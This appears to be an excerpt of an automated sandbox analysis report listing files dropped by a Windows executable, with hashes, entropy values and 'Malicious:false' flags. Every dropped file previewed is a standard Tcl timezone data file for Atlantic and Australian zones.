                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2215
                                                                                                                                                                                                                                                    Entropy (8bit):3.889108793636345
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Stanley) {. {-9223372036854775808 -13884 0 LMT}. {-2524507716 -13884 0 SMT}. {-1824235716 -14400 0 FKT}. {-1018209600 -10800 1 FKST}. {-1003093200 -14400 0 FKT}. {-986760000 -10800 1 FKST}. {-971643600 -14400 0 FKT}. {-954705600 -10800 1 FKST}. {-939589200 -14400 0 FKT}. {-923256000 -10800 1 FKST}. {-908139600 -14400 0 FKT}. {-891806400 -10800 1 FKST}. {-876690000 -14400 0 FKT}. {-860356800 -10800 1 FKST}. {420606000 -7200 0 FKT}. {433303200 -7200 1 FKST}. {452052000 -10800 0 FKT}. {464151600 -7200 1 FKST}. {483501600 -10800 0 FKT}. {495597600 -14400 0 FKT}. {495604800 -10800 1 FKST}. {514350000 -14400 0 FKT}. {527054400 -10800 1 FKST}. {545799600 -14400 0 FKT}. {558504000 -10800 1 FKST}. {577249200 -14400 0 FKT}. {589953600 -10800 1 FKST}. {608698800 -14400 0 FKT}. {621403200 -10800 1 FKST}. {640753200 -14400 0 FKT}. {652852800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.813373101386862
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjpMFBx/h4QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCeMFB/4D2
                                                                                                                                                                                                                                                    MD5:F48AD4B81CD3034F6E5D3CA1B5A8BDD4
                                                                                                                                                                                                                                                    SHA1:676FE3F50E3E132C1FD185A1EE1D8C830763204F
                                                                                                                                                                                                                                                    SHA-256:553D7DA9A2EDBD933E8920573AE6BCBAA00302817939046CF257CAEACEC19FAD
                                                                                                                                                                                                                                                    SHA-512:36A4E2286FBEF2F4ED4B9CD1A71136E227FEF4B693F9F43649B790E859221EE470679A7E3C283770DA5CB0113A1C8C1F99480E7020328FFE3E9C870798B092F5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/ACT) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8099
                                                                                                                                                                                                                                                    Entropy (8bit):3.812665609163787
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:JPtFF+Wc4CNphbQbPzpRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:JP5+zNMdYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                    MD5:4E73BDB571DBF2625E14E38B84C122B4
                                                                                                                                                                                                                                                    SHA1:B9D7B7D2855D102800B53FB304633F5BC961A8D0
                                                                                                                                                                                                                                                    SHA-256:9138DF8A3DE8BE4099C9C14917B5C5FD7EB14751ACCD66950E0FDB686555FFD6
                                                                                                                                                                                                                                                    SHA-512:CF9AB3E9A7C1A76BCC113828ABAF88FE83AAF5CAD7BD181201E06A0CF43E30BA8817AAA88AB3F0F14F459599D91F63ECE851F095154050263C5AD08B2275B4C7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Adelaide) {. {-9223372036854775808 33260 0 LMT}. {-2364110060 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACST}. {341339400 37800 1 ACDT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):651
                                                                                                                                                                                                                                                    Entropy (8bit):4.265580091557009
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52nmdHLOYPv+tCdd8xdsWz9ag5J4UVdKcWWC:cQne6skVk
                                                                                                                                                                                                                                                    MD5:296B4B78CEE05805E5EE53B4D5F7284F
                                                                                                                                                                                                                                                    SHA1:DDB5B448E99F278C633B2DBD5A816C4DE28DC726
                                                                                                                                                                                                                                                    SHA-256:2580C3EEEC029572A1FF629E393F64E326DEDAA96015641165813718A8891C4D
                                                                                                                                                                                                                                                    SHA-512:9DE71000BB8AC48A82D83399BD707B661B50882EEBFE2A7E58A81A2F6C04B1F711DAE3AA09A77A9EE265FB633B8883D2C01867AF96F8BE5137119E4FB447DF8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Brisbane) {. {-9223372036854775808 36728 0 LMT}. {-2366791928 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8162
                                                                                                                                                                                                                                                    Entropy (8bit):3.820479465698825
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:EkxtFF+Wc4Yphbhd1zCRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:Ekx5+X5sYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                    MD5:B4AF947B4737537DF09A039D1E500FB8
                                                                                                                                                                                                                                                    SHA1:CCC0DC52D586BFAA7A0E70C80709231B4BB93C54
                                                                                                                                                                                                                                                    SHA-256:80BBD6D25D4E4EFA234EAD3CB4EB801DC576D1348B9A3E1B58F729FEB688196D
                                                                                                                                                                                                                                                    SHA-512:3B27C36FA3034CB371DD07C992B3A5B1357FC7A892C35910DA139C7DA560DDC0AA1E95966438776F75397E7219A7DA0AD4AD6FB922B5E0BE2828D3534488BFD0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Broken_Hill) {. {-9223372036854775808 33948 0 LMT}. {-2364110748 36000 0 AEST}. {-2314951200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACS
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):190
                                                                                                                                                                                                                                                    Entropy (8bit):4.80238049701662
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjnSV1+QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCcq+DCyu
                                                                                                                                                                                                                                                    MD5:16F9CFC4C5B9D5F9F9DB9346CECE4393
                                                                                                                                                                                                                                                    SHA1:ED1ED7BA73EB287D2C8807C4F8EF3EFA516F5A68
                                                                                                                                                                                                                                                    SHA-256:853A159B8503B9E8F42BBCE60496722D0A334FD79F30448BAD651F18BA388055
                                                                                                                                                                                                                                                    SHA-512:9572CCB1BC499BADA72B5FE533B56156DB9EB0DEDFD4AE4397AD60F2A8AF5991F7B1B06A1B8D14C73832543AF8C12F5B16A9A80D093BF0C7ED6E38FF8B66E197
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/Canberra) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8097
                                                                                                                                                                                                                                                    Entropy (8bit):3.7668602204696375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:GJiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:GJqXytLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:7E0D1435E11C9AE84EF1A863D1D90C61
                                                                                                                                                                                                                                                    SHA1:CE76A3D902221F0EF9D8C25EB2D46A63D0D09D0B
                                                                                                                                                                                                                                                    SHA-256:3C0B35627729316A391C5A0BEE3A0E353A0BAEAD5E49CE7827E53D0F49FD6723
                                                                                                                                                                                                                                                    SHA-512:D262294AC611396633184147B0F6656290BF97A298D6F7EC025E1D88AAC5343363744FD1CB849CDE84F3C1B2CF860CFA7CA43453ADBF68B0903DA1361F0DCD69
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Currie) {. {-9223372036854775808 34528 0 LMT}. {-2345794528 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {47138400 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                    Entropy (8bit):4.4678452003570435
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52umdHPPZUj/sVdFFtf/FFAXFFwFFgh:cQuenZq/sVd/tH/AX/w/C
                                                                                                                                                                                                                                                    MD5:FC9689FEF4223726207271E2EAAE6548
                                                                                                                                                                                                                                                    SHA1:26D0B4FC2AD943FCAC90F179F7DF6C18EE12EBB8
                                                                                                                                                                                                                                                    SHA-256:C556C796CCD3C63D9F694535287DC42BB63140C8ED39D31FDA0DA6E94D660A1C
                                                                                                                                                                                                                                                    SHA-512:7898C0DE77297FBAA6AAF9D15CB9765DAF63ED4761BA181D0D1A590A6F19A6B7F6E94564A80EB691ED2D89C96D68449BF57816E4093E5011B93D30C3E1624D60
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Darwin) {. {-9223372036854775808 31400 0 LMT}. {-2364108200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):734
                                                                                                                                                                                                                                                    Entropy (8bit):4.311332541012831
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp527JmdHvOYP2MWcDmMuUc0kUmM5c6uwmMIUv2ic5HVKmMwcqmMVcmmMscukxU:cQ7JemsnmUduwwRh00xAiNQhqU1
                                                                                                                                                                                                                                                    MD5:AD8EF9C3FFC8A443A4559EC7C6E48D44
                                                                                                                                                                                                                                                    SHA1:B2332BC4EDFDAAEBB7AE59AD3E82FBF5308EC003
                                                                                                                                                                                                                                                    SHA-256:3028DB3A5067D665E11DF993DCB1140CF7A534AF253B1906DAF0BE266A7241BE
                                                                                                                                                                                                                                                    SHA-512:C57A45D3BB50666068616AF9F18C969888C261BC5CA4BFFEAB9D0A456AF52C5D021E0ABBE1776BF9D92A2672D1045E3036A0E649925FF5646FC3E72511D1750D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Eucla) {. {-9223372036854775808 30928 0 LMT}. {-2337928528 31500 0 ACWST}. {-1672562640 35100 1 ACWDT}. {-1665387900 31500 0 ACWST}. {-883637100 35100 1 ACWDT}. {-876123900 31500 0 ACWST}. {-860395500 35100 1 ACWDT}. {-844674300 31500 0 ACWST}. {-836473500 35100 0 ACWST}. {152039700 35100 1 ACWDT}. {162926100 31500 0 ACWST}. {436295700 35100 1 ACWDT}. {447182100 31500 0 ACWST}. {690311700 35100 1 ACWDT}. {699383700 31500 0 ACWST}. {1165079700 35100 1 ACWDT}. {1174756500 31500 0 ACWST}. {1193505300 35100 1 ACWDT}. {1206810900 31500 0 ACWST}. {1224954900 35100 1 ACWDT}. {1238260500 31500 0 ACWST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8325
                                                                                                                                                                                                                                                    Entropy (8bit):3.767204262183229
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:8xKiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:8xKqXytLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:67AF9A2B827308DD9F7ABEC9441C3250
                                                                                                                                                                                                                                                    SHA1:CD87DD4181B41E66EFEA9C7311D5B7191F41EA3A
                                                                                                                                                                                                                                                    SHA-256:814BD785B5ACDE9D2F4FC6E592E919BA0FE1C3499AFC1071B7FA02608B6032AB
                                                                                                                                                                                                                                                    SHA-512:BC6B8CE215B3B4AC358EB989FB1BB5C6AD61B39B7BBD36AAA924A2352E823C029131E79DA927FEEBDD5CF759FDE527F39089C93B0826995D37052362BEAE09F6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Hobart) {. {-9223372036854775808 35356 0 LMT}. {-2345795356 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {-94730400 36000 0 AEST}. {-71136000 39600 1 AEDT}. {-55411200 36000 0 AEST}. {-37267200 39600 1 AEDT}. {-25776000 36000 0 AEST}. {-5817600 39600 1 AEDT}. {5673600 36000 0 AEST}. {25632000 39600 1 AEDT}. {37728000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):194
                                                                                                                                                                                                                                                    Entropy (8bit):4.865814837459796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3yIoGEowFVAIgjG/L2DCkx/2DCPGT:MBaIMje0QL2a7
                                                                                                                                                                                                                                                    MD5:1221FC8932CA3DCA431304AF660840F0
                                                                                                                                                                                                                                                    SHA1:5E023E37D98EA1321B10D36A79B26DF1A017F9D5
                                                                                                                                                                                                                                                    SHA-256:EB8FDBCFDE9E2A2AA829E784D402966F61A5BF6F2034E0CB06A24FACB5B87874
                                                                                                                                                                                                                                                    SHA-512:EB19FE74DC13456D0F9F1EDC9C444793A4011D3B65ADF6C7E7A405504079EB3A0C27F69DDA662F797FE363948E93833422F5DC3C1891AA7D414B062BE4DD3887
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Lord_Howe)]} {. LoadTimeZoneFile Australia/Lord_Howe.}.set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):796
                                                                                                                                                                                                                                                    Entropy (8bit):4.1890768067004
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52gCmdHVP/+tCdd8xdsWz9ag5J4UVdKcWW3ty/yJATUJrRxC:cQgCeRUVfl7w
                                                                                                                                                                                                                                                    MD5:08E88B2169BC76172E40515F9DA2C147
                                                                                                                                                                                                                                                    SHA1:5C03B7C9748E63C2B437C97F8ED923A9F3E374E7
                                                                                                                                                                                                                                                    SHA-256:9E3558C8514E97274D9F938E9841C5E3355E738BBD55BCB17FA27FF0E0276AEA
                                                                                                                                                                                                                                                    SHA-512:39E10639C97DE82428818B9C5D059BA853A17113351BAEE2512806AC3066EDDF0294859519AFBE425E0D1315B1A090F84C08CEFEDCE2A3D3A38EEF782234D8C4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lindeman) {. {-9223372036854775808 35756 0 LMT}. {-2366790956 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}. {709912800 36000 0 AEST}. {719942400 39600 1 AEDT}. {731433600 36000 0 AEST}. {751996800 39600 1 AEDT}. {762883200 36000 0 AEST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7251
                                                                                                                                                                                                                                                    Entropy (8bit):3.8305538870955127
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:zVKHN3t5NY3aUeFANqlbWYk3Fb0r/Dnuj7v28P18qrc/JFmiRQTIPw3ar:zIyTNqlbWYk1bU7PR
                                                                                                                                                                                                                                                    MD5:B23F257BC30FD057ABD04C64A3EF02C1
                                                                                                                                                                                                                                                    SHA1:B35BE3C39F87CCF2E9786D024F9AE7850700FC47
                                                                                                                                                                                                                                                    SHA-256:CD4FF9F07D4BB675EA0D3559436965DDE2899A5BB7F732D78E90D7AF77E426FF
                                                                                                                                                                                                                                                    SHA-512:5668B65099BF5D50F1346DFCE4EE0193FD85E5BE3A4B148C8ECDF042E189EF5A56168DE53A0484D1BF0584875113375835A73DE7BA3E0A8C2ED16BB147DE3DCB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lord_Howe) {. {-9223372036854775808 38180 0 LMT}. {-2364114980 36000 0 AEST}. {352216800 37800 0 LHST}. {372785400 41400 1 LHDT}. {384273000 37800 0 LHST}. {404839800 41400 1 LHDT}. {415722600 37800 0 LHST}. {436289400 41400 1 LHDT}. {447172200 37800 0 LHST}. {467739000 41400 1 LHDT}. {478621800 37800 0 LHST}. {499188600 39600 1 LHDT}. {511282800 37800 0 LHST}. {530033400 39600 1 LHDT}. {542732400 37800 0 LHST}. {562087800 39600 1 LHDT}. {574786800 37800 0 LHST}. {594142200 39600 1 LHDT}. {606236400 37800 0 LHST}. {625591800 39600 1 LHDT}. {636476400 37800 0 LHST}. {657041400 39600 1 LHDT}. {667926000 37800 0 LHST}. {688491000 39600 1 LHDT}. {699375600 37800 0 LHST}. {719940600 39600 1 LHDT}. {731430000 37800 0 LHST}. {751995000 39600 1 LHDT}. {762879600 37800 0 LHST}. {783444600 39600 1 LHDT}. {794329200 37800 0 LHST}. {8148
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8069
                                                                                                                                                                                                                                                    Entropy (8bit):3.769669933493392
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:sriG+vi8GyddsYtLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:sr/2tLhbVXdnPQler
                                                                                                                                                                                                                                                    MD5:E38FDAF8D9A9B1D6F2B1A8E10B9886F4
                                                                                                                                                                                                                                                    SHA1:6188BD62E94194DB469BE93224A396D08A986D4D
                                                                                                                                                                                                                                                    SHA-256:399F727CB39D90520AD6AE78A8963F918A490A813BC4FF2D94A37B0315F52D99
                                                                                                                                                                                                                                                    SHA-512:79FDCFF5066636C3218751C8B2B658C6B7A6864264DCC28B47843EAEFDD5564AC5E4B7A66E3D1B0D25DB86D6C6ED55D1599F1FE2C169085A8769E037E0E954BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Melbourne) {. {-9223372036854775808 34792 0 LMT}. {-2364111592 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}. {352224000 36000 0 AEST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.8456659038249
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjREeQWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DC5eDCyu
                                                                                                                                                                                                                                                    MD5:AE3539C49047BE3F8ABAD1AC670975F1
                                                                                                                                                                                                                                                    SHA1:62CD5C3DB618B9FE5630B197AB3A9729B565CA41
                                                                                                                                                                                                                                                    SHA-256:938A557C069B8E0BE8F52D721119CBA9A694F62CF8A7A11D68FD230CC231E17C
                                                                                                                                                                                                                                                    SHA-512:6F143B50C1EEC1D77F87DD5B0FFCF6625800E247400AA58361748BFEA0626E2CDA9C3FD2A4C269B3218D28FF1FB8533F4F6741F6B2C5E83F9C84A5882C86716B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/NSW) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):187
                                                                                                                                                                                                                                                    Entropy (8bit):4.780732237583773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
